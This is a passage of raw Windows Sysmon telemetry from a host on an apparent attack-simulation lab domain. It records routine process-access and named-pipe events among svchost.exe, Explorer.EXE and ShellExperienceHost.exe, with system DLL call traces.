12:02:32.801{266CAFBE-647D-6064-3300-00000000AE01}25204828C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\tileobjserver.dll+bc8f|c:\windows\system32\tileobjserver.dll+26da2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a 18141800x80000000000000007401Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-ConnectPipe2021-03-31 12:02:32.801{266CAFBE-64C5-6064-A500-00000000AE01}4356\TDLN-4356-41C:\Windows\Explorer.EXE 17141700x80000000000000007400Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:02:32.801{266CAFBE-647D-6064-3300-00000000AE01}2520\TDLN-4356-41C:\Windows\system32\svchost.exe 10341000x80000000000000007399Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:32.801{266CAFBE-647D-6064-3300-00000000AE01}25204828C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\tileobjserver.dll+bce2|c:\windows\system32\tileobjserver.dll+26f12|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000007398Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:32.801{266CAFBE-647D-6064-3300-00000000AE01}25204828C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\tileobjserver.dll+bc8f|c:\windows\system32\tileobjserver.dll+26f12|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a 10341000x80000000000000007397Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:32.801{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007396Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:32.801{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007395Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:32.785{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007394Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:32.785{266CAFBE-64C5-6064-A500-00000000AE01}43565852C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\wpncore.dll+38f2d|C:\Windows\System32\wpncore.dll+37bbe|C:\Windows\System32\wpncore.dll+232a3|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b 10341000x80000000000000007393Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:32.785{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007392Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:32.785{266CAFBE-64C5-6064-A500-00000000AE01}43565852C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\wpncore.dll+38f2d|C:\Windows\System32\wpncore.dll+38e70|C:\Windows\System32\wpncore.dll+23267|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b 10341000x80000000000000007391Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:32.785{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007390Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:32.785{266CAFBE-64C5-6064-A500-00000000AE01}43565852C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\wpncore.dll+38f2d|C:\Windows\System32\wpncore.dll+37bbe|C:\Windows\System32\wpncore.dll+232a3|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b 10341000x80000000000000007389Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:32.785{266CAFBE-64C5-6064-A500-00000000AE01}43565852C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\wpncore.dll+38f2d|C:\Windows\System32\wpncore.dll+38e70|C:\Windows\System32\wpncore.dll+23267|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b 10341000x80000000000000007388Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:32.785{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007387Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:32.785{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007386Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:32.785{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007385Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:32.785{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007384Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:32.785{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007383Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:32.754{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007382Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:32.739{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007381Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:32.739{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007380Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:32.692{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007379Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:32.692{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007378Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 